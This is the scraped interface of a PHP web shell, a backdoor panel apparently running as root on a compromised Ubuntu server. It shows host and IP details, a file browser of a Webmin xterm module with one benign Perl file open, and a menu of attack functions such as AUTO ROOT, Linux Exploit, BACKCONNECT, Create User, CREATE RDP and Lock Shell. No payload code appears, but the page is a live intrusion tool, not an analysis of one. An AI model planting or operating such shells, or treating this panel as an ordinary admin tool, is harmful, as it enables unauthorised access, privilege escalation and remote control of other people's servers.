Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
webmin /
xterm /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
rc
[ DIR ]
drwxr-xr-x
acl_security.pl
395
B
-rw-r--r--
config
53
B
-rw-r--r--
config.info
591
B
-rw-r--r--
defaultacl
10
B
-rw-r--r--
index.cgi
7.06
KB
-rwxr-xr-x
module.info
176
B
-rw-r--r--
shellserver.pl
4.65
KB
-rwxr-xr-x
websockets-lib-funcs.pl
2.53
KB
-rw-r--r--
xterm-addon-attach.js
1.63
KB
-rw-r--r--
xterm-addon-fit.js
1.45
KB
-rw-r--r--
xterm-lib.pl
886
B
-rw-r--r--
xterm.css
2.18
KB
-rw-r--r--
xterm.js
269.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acl_security.pl
require 'xterm-lib.pl'; # acl_security_form(&options) # Output HTML for editing security options for the xterm module sub acl_security_form { my ($o) = @_; print &ui_table_row($text{'acl_user'}, &ui_opt_textbox("user", $o->{'user'} eq '*' ? undef : $o->{'user'}, 20, $text{'acl_sameuser'})); } sub acl_security_save { my ($o) = @_; $o->{'user'} = $in{'user_def'} ? '*' : $in{'user'}; }
Close